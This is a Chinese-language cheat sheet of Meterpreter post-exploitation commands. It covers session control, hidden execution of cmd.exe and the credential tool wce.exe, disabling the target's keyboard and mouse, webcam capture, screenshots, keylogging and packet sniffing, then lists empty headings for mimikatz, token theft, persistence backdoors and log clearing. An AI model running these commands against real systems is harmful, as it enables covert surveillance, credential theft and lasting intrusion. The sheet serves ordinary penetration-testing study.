meterpreter

交互

CTRL+Z    把session放入后台
当攻击成功后会返回会话,使用session -l命令列出当前获取到的会话
>session -l
使用
>sessions -i id 来进入一个会话进行交互
>sessions -k id 杀死一个会话
>background 将当前会话放置后台
>sessions -x检查心跳
>sessions -u [ID] cmdshell升级meterpreter shell
>reboot / shutdown   重启/关机

命令

>idletime 查看目标机闲置时间
>shell 进入目标cmdshell
>uictl [enable/disable] [keyboard/mouse/all]  开启或禁止键盘/鼠标
>uictl disable mouse  禁用鼠标
>uictl disable keyboard  禁用键盘
>webcam_list   查看摄像头
>webcam_snap   通过摄像头拍照
>webcam_stream  通过摄像头开启视频
>execute -H -i -f cmd.exe 执行cmd.exe,-H不可见,-i交互 
>execute -H -m -d calc.exe -f wce.exe -a "-o 1.txt" 隐藏执行
>execute -H -i -c -m -d calc.exe -f /root/wce.exe -a  -w   从内存执行
>ps 查看进程
>migrate pid     迁移进程
>kill pid   #杀死进程
>screenshot  截图
>run 执行模块,2下tab列出
>run post/windows/capture/keylog_recorder 键盘记录
>run packetrecorder -li 列出接口
>run packetrecorder -i 1  监控接口

文件操作

提权

后渗透&权限维持

查看信息ip和路由

端口转发

添加路由及进行扫描

Socks4a代理

mimikatz抓密码

开启RDP

sniffer抓包

incognito假冒令牌

steal_token窃取

hash

persistence启动项后门

metsvc

清理日志

最后更新于

这有帮助吗?